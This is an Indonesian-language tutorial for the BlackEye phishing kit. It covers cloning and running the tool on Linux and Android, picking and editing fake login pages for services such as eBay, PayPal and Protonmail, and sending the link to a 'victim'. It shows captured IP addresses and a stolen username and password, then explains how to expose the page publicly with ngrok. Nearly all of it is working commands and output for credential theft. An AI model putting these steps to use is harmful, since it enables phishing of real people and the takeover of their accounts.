Cara install blackeye
Installasi buat linux:
git clone https://github.com/Git-Ankitraj/blackeye-im.gitcd blackeye-imchmod +x ./setup.sh./setup.sh
Penggunaan:
./blackeye.sh
Android (termux and equivalents).
git clone https://github.com/Git-Ankitraj/blackeye-im.gitcd blackeye-imchmod +x ./tmxsp.sh
Penggunaan:
./tmxsp.sh
#1. Uji coba blackeye
Setelah kita download blackeye dengan perintah git di atas,kita buka dan jalankan folder blackeye nya dengan perinah :
~$git clonehttps://github.com/Git-Ankiraj/blackeye-im.gitCloning into 'blackeye-im'...remote: Enumerating objects: 361, done.remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.Resolving deltas: 100% (101/101), done.~$ cd blackeye-im~$ chmod +x ./setup.sh~$ ./setup.sh~/blackeye-im$
sekarang kita sudah berada didalam folder blackeye nya.
Itu harus menginstal repositori BlackEye dan mengaktifkannya untuk menjalankannya dari folder blackeye dengan perintah bash blackeye.sh . Ketika kita menjalankan perintah, kita akan melihat layar splash di bawah ini.
~/blackeye$ bash blackeye.sh:: Disclaimer: Developers assume no liability and are not :::: responsible for any misuse or damage caused by BlackEye. :::: Only use for educational purporses!! :::: Attacking targets without mutual consent is illegal! ::[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒[09] PayPal [25] Messenger ▒▒█████──────────▐███▌[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒[15] Wordpress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒[16] Microsoft [32] devianART CODED BY: @thelinuxchoiceUPGRADED BY: @suljot_gjoka
#2. Sesuaikan situs web phising
Jika kami tidak menyukai sesuatu seperti pemberitahuan hak cipta yang kedaluwarsa, kami dapat mengubahnya dengan mudah. Pertama, keluar dari skrip bash kembali ke folder blackeye. Kemudian, kita akan mengetik ls untuk melihat folder situs di dalam repo BlackEye.
~/blackeye$ lsblackeye.sh LICENSE README.md sites
Kita dapat menavigasi ke sana menggunakan perintah situs cd . Kemudian, ketik ls untuk melihat semua templat situs phishing yang tersedia untuk dimodifikasi.
~/blackeye$ cd sites~/blackeye/sites$ lsadobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpressbadoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoocreate dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex
Untuk mengedit Protonmail, kita bisa mengetikkan cd protonmail lalu ls lagi untuk melihat file-file di folder tersebut. Anda akan melihat sesuatu seperti file di bawah ini.
~/blackeye/sites$ cd protonmail~/blackeye/sites/protonmail$ lsindex_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt
Untuk mengedit HTML halaman phishing, Anda dapat melakukannya secara langsung dengan membuka login.html dengan editor teks, sehingga Anda dapat dengan mudah memperbarui pemberitahuan hak cipta atau detail lainnya.
#3. tampilkan halaman phishing
Untuk memulai halaman phishing kami, buka jendela terminal dan arahkan ke folder blackeye lagi. Kemudian, jalankan perintah bash blackeye.sh untuk kembali ke menu pemilihan halaman phishing. Di sini, kami akan memilih eBay, yaitu nomor 18.
~/blackeye/sites/protonmail$ cd~$ cd blackeye~/blackeye$ bash blackeye.sh[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒[09] PayPal [25] Messenger ▒▒█████──────────▐███▌[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒[15] Wordpress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒[16] Microsoft [32] devianART CODED BY: @thelinuxchoiceUPGRADED BY: @suljot_gjoka[*] Choose an option: 18
Setelah memasukkan nomor situs yang ingin Anda buat, tekan enter . Selanjutnya, kita akan diminta untuk memberikan alamat IP kita. Jika Anda menekan enter tanpa menambahkannya, itu akan mencoba menambahkan milik Anda secara default, tetapi tidak selalu berhasil. Setelah memberikan alamat IP Anda, Anda akan melihat sesuatu seperti prompt di bawah ini.
[*] Put your local IP (Default 10.0.6.27):[*] Starting php server...[*] Send this link to the Victim: 192.168.0.16[*] Waiting victim open the link ...
Selanjutnya, navigasikan ke tautan phishing di browser untuk melihat hasil situs phishing Anda.
#4. Ambil kata sandi
Saat Anda membuka situs di browser, itu akan terlihat seperti ini:
Membuka tautan menyebabkan skrip melaporkan kembali jenis perangkat yang saat ini mengakses halaman phishing.
[*] Waiting victim open the link ...[*] IP Found![*] Victim IP: 192.168.43.142[*] User-Agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0[*] Saved: shopping/saved.ip.txt
Setelah target memasukkan kredensial mereka, mereka diarahkan ke halaman eBay yang sebenarnya, menciptakan ilusi login yang berhasil.
Di pihak peretas, BlackEye memberi kami kredensial yang baru saja dimasukkan target kami.
[*] Waiting credentials ...[*] Credentials Found![*] Account: fudruckers[*] Password: thefudruckerking69[*] Saved: sites/shopping/saved.usernames.txt
Sama seperti itu, kami telah mencegat dan menyimpan kredensial yang dimasukkan target ke halaman phishing kami!
Jika anda menemukan masalah dengan server ngrok
ketika blackeye memulai server ngrok anda tidak mendapatkan tautan untuk di kirim ke korban,seperti terlihat di bawah ini.
Hal terbaik yang dapat Anda lakukan adalah melakukan port forward sendiri
Langkah 1:
Buka dua tab terminal dan mulai halaman phishing di LAN, tautannya mungkin terlihat seperti http://192.168.1.111:4444 atau 127.0.0.1:4444
Di terminal lain, autentikasi ngrok dan tetap siap
Langkah 2:
Mengunggah halaman phishing ke internet menggunakan penerusan porta:
Di terminal lain lakukan:
Sudo ./ngrok http 127.0.0.1:4444
Langkah 3:
Kirim tautan baru yang dihasilkan oleh ngrok:
Ini akan berbeda dan akan terlihat seperti ini:
1f00a2103dc6.ngrok.io
1f00a2103dc6.ngrok.io
Jangan ragu untuk mengoreksi saya
Terima kasih semoga ulasan ini membantu..